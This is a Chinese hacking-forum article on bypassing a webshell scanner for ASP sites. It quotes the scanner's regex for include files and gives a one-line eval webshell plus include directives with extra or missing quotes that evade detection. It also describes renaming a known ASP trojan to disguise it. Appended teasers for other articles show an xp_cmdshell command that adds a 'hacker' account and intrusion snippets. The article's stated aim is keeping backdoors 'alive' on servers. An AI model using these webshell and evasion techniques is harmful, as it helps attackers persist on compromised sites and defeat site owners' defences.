攻破雷客图ASP站长安全助手

所属分类: 网络安全 / 黑客入侵 阅读数: 646
收藏 0 赞 0 分享
到Lake2网站上下了1.5的源代码,发现这个版本的确改进了不少,又增加了查杀功能:
1:查杀通过了Unicode编码的ASP木马
2:查杀使用了(Open|Create)TextFile, SaveToFile,Save, set Server,Server.(Transfer|Execute), ShellExecute,Exec,Run方法的文件
3:改变原来以FSO方法中OpenTextFile打开文件的方式,现改为使用ADODB.Stream对方法中的open方式打开
程序增加了这三个功能后,查杀木马的能力大大增强,要突破过去,有难度!难怪不得,Lake2在其网站上称几乎能杀所有ASP木马.今天我们就来看看如何突破它.
当我这次读站长助手代码的时,注意到了这样一个问题:这个ASP站长安全助手使用了大量的正则表达式,对于正则表达式,我个人的看法是:如果匹配得好,要突破很不容易;但是若匹配得不好,我们就可以轻易的突破,一个再强大的系统也将变得不安全.在突破它之前,我们先看看正则表达式的基本语法.
* 匹配前面的子表达式零次或多次。例如,zo* 能匹配 "z" 以及 "zoo"。 * 等价于{0,}。
\s 匹配任何空白字符,包括空格、制表符、换页符等等。等价于 [ \f\n\r\t\v]。
. 匹配除换行符 \n之外的任何单字符。要匹配 .,请使用 \。
若我们使用”\s”和”*”相结合为”\s*”,最终将匹配0个或多个空格,制表符,换页符等.若我们使用”.”与”*”相结合为”.*”将匹配0个或多个除了换行符之外的字符.有了这些知识后,就让我们来看看它的代码.
在admin_scanwebshell.asp中,有如下代码:
’Check include file with "
Set regEx = New RegExp //建立正则表达式对象
regEx.IgnoreCase = True //忽略大小写
regEx.Global = True //设置为全局匹配
regEx.Pattern = "<!--\s*#include\s*file\s*=\s*".*"" //模式
Set Matches = regEx.Execute(filetxt) //用正则表达式模式在字符串filetxt中运行查找,并返回包含该查找结果的一个数组, 如果 exec 方法没有找到匹配,则它返回 null
For Each Match in Matches
tFile = Replace(Mid(Match.Value, Instr(Match.Value, """) 1, Len(Match.Value) - Instr(Match.Value, """) - 1),"/","\") //进行查找和替换工作
If Not CheckExt(FSOs.GetExtensionName(tFile)) Then //若是属于被检查的后缀名,则进行下一步的查杀工作
Call ScanFile( Mid(FilePath,1,InStrRev(FilePath,"\"))&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) ) //调用文件进行查杀
SumFiles = SumFiles 1
End If
(注:在另一文件中使用几乎相同的函数,只是把上面函数的双引号换成了单引号)
下面,我们一起来分析这个程序的执行过程,在这里,假如我们使用了”<!--#include file="1.txt"-->”.程序按照设置好的正则表达式模式regEx.Pattern = "<!--\s*#include\s*file\s*=\s*".*""在filetxt中进行查找, 并返回包含该查找结果的一个数组,因为我们的字符串:<!--#include file="1.txt"-->和设置好的正则表达式模式相符,所以返回包含该查找结果的一个数组.然后再进行查找和替换和查杀操作,要是我们能构造一个字符串,让它不符合这个模式,那么将返回NULL,也就不会杀我们的ASP马,下面我们来实验:
第一步:
1:新建一个文件ttfct.txt,其内容为:<%eval request(“go”)%>.
2:新建一个文件nokill.asp,其内容为<!--#include file=”ttfct.txt”-->
用雷客图ASP站长安全助手1.5进行查. 用Lake2的一句客服端连接,显示正常.
第二步:
修改nokill.asp,使其内容为<!--#include file=”ttfct.t”ss”xt”-->,再次连接. 不知道大家注意到这一句没有: Active Server Pages, ASP 0126 (0x80004005),找不到包含文件 ’ttfct.t’。/ttfct/nokill.asp, 第 1 行
为什么我们这里只有ttfct.t,那xt难道被吃了不成?的确,xt就是被吃了,因为被截断了.那我们把xt补上,其内容变为: <!--#include file=”ttfct.txt”ss”xt”-->,再次提交,结果成功,显示效果和图二相同.拿我们现在构造的语句: <!--#include file=”ttfct.txt”ss”xt”-->和regEx.Pattern = "<!--\s*#include\s*file\s*=\s*".*""进行匹配,大家发现没有,我们的语句有4个引号,而此匹配的语句只有两个引号,当然匹配就不会成功了.下面查杀的结果证明了我的分析.
“Include file=”后面可以加字符串,那么,两边能加不,为此,我们改内容为 "ttfct"<!--#include file="ttfct.txt"-->"同样能成功连接并且突破雷客图ASP站长安全助手,我们再构造: <!--#include file=ttfct.txt-->(注意:ttfct.txt两边没有引号),这样就都能成功的让我们的一句话木马长久的活下去.
一句话木马起始回生,用同样的方法我们可以让海洋ASP木马躲过它的查杀,具体方法是,把海洋ASP木马的后缀改为.dll,.hack等,随便你,大家任意发挥,改成你的名字都可以:).
然后我们新建一个文件命名为hy.asp,将代码<!--#include file="hy.dll”stssst"-->放进去,通过访问hy.asp也就调用了海洋了.
总结:除了对ASP语言了解之外,我们还要通过实践,这样,才得真正的走向成功的大门.
如果你对此免杀还有更好的方法,欢迎来和我交流,我的ID是TTFCT.

更多精彩内容其他人还在看

入侵土耳其网站实例

打开SQL用查询分析器连上,发现了几个数据库估计是服务器的几个网站共用的这一个SQL server 于是立刻本地构造一个注射点,准备列目录。 构造注射点代码如下: <% Set conn = Server.CreateObject("ADODB.Conne
收藏 0 赞 0 分享

MS07-029漏洞利用入侵过程

前言: MS07-029,Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。漏洞的前提是没打补丁,开启DNS服务的所有版本WINDOWS 2000 Server和WINDOWS 2003 Server。 今天
收藏 0 赞 0 分享

入侵RedHat Linux系统实例

下 载:http://210.77.146.151/images/hlc/files/seclpd.c 我写此文的目的不在于教人入侵,而是为了提高自身的技术和加强网络管理员的安全防范意识。仅此而已!粗心大意的网络管理员应该明白:由于你们一个小小的操作失误可能会导致整个
收藏 0 赞 0 分享

记一次曲折的php入侵

闲着无聊就又找了个站来玩玩。随便找了个。点看链接一看php的。。php的就php的吧。反正练习 于是就判断是否存在注入点。 and 1=1 and 1=2 返回不同。判断数据库是否大于4。0.。大于呵呵。可。。正当高行的时候。却发现无法查询。。 以下是代码片段:
收藏 0 赞 0 分享

实例讲解木马的分析方法

以前有过一款国产木马,它有个好听的名字,叫做“广外女生”。这个木马是广东外语外贸大学“广外女生”网络小组的作品,它可以运行于WIN98,WIN98SE,WINME,WINNT,WIN2000或已经安装Winsock2.0的Win95
收藏 0 赞 0 分享

Cmd模式下的入侵技术大全

前言 Cmd Shell(命令行交互)是黑客永恒的话题,它历史悠久并且长盛不衰。 本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。 文件传输 对于溢出漏洞获得的cmd shell,最大的问题就是如
收藏 0 赞 0 分享

知道对方IP入侵别人的电脑

黑客已经成为一种文化,很多人想成为黑客,他们偶尔学到了几种小花招,总喜欢拿别人开玩笑,搞些恶作剧。其实黑客的最高境界在于防守,不在于进攻。所谓明枪易躲暗箭难防,要防住他人所有的进攻,肯定需要懂得比对方更多的系统知识,了解更多的系统漏洞,及如何弥补漏
收藏 0 赞 0 分享

网络入侵也玩双通道

一个14岁的男孩经过无数次的实验,推出了一款全新的木马——SUF 1.0,该后门运用了“反弹端口原理”与“FTP 隧道技术”,也就是两台机器不直接传输数据,而是利用第三台机器(FTP服务器)来交换数据.
收藏 0 赞 0 分享

通过MSSQL 2000 入侵服务器主机器的命令

首先确保得到数据库超级管理员权限 然后执行如下SQL命令: 1、exec master.dbo.xp_cmdshell 'net user hacker hacker /add' 2、exec master.dbo.xp_cmdshell 'net localgroup
收藏 0 赞 0 分享

phpcms2008 注入漏洞 利用分析

这个是最新有人发现的 该漏洞文件:ask/search_ajax.php 漏洞说明: /ask/search_ajax.php Code: if($q) { $where = " title LIKE '%$q%' AND status = 5&qu
收藏 0 赞 0 分享
查看更多